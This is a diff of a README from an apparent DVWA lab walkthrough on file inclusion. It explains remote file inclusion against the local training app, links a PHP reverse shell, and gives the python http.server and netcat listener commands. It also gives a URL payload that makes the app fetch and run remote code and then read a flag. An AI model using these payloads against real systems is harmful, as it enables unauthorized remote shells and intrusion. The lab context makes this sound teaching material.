Abdy01/DVWA-Walkthrough/File-Inclusion/README.md

 RFI is more dangerous than LFI because usually leads to Remote Code Execution.
 For the next example we will host a python server and use a reverse shell for the RFI vulnerability.

-A php reverse shell can be downloaded from here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
+A php reverse shell can be downloaded from here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php <br />
-Edit it with the ip of your machine and the port you want to use, for this example the ip will be 127.0.0.1 and port 4444.
+Edit it with the ip of your machine and the port you want to use, for this example the ip will be 127.0.0.1 and port 4444.<br />
-Start a python server at the location of the reverse shell file: `python3 -m http.server 4445` Start a netcat listener: `nc -lvnp 4444`
+Start a python server at the location of the reverse shell file: `python3 -m http.server 4445`<br />
+Start a netcat listener: `nc -lvnp 4444`<br />
-And now we can access the URL: `http://localhost/DVWA/vulnerabilities/fi/?page=http://127.0.0.1:4445/rev.php` Now we have access on the server and we can go and read the `/hackable/flags/fi.php` file.
+And now we can access the URL: `http://localhost/DVWA/vulnerabilities/fi/?page=http://127.0.0.1:4445/rev.php`<br />
+Now we have access on the server and we can go and read the `/hackable/flags/fi.php` file.

 <p align="center">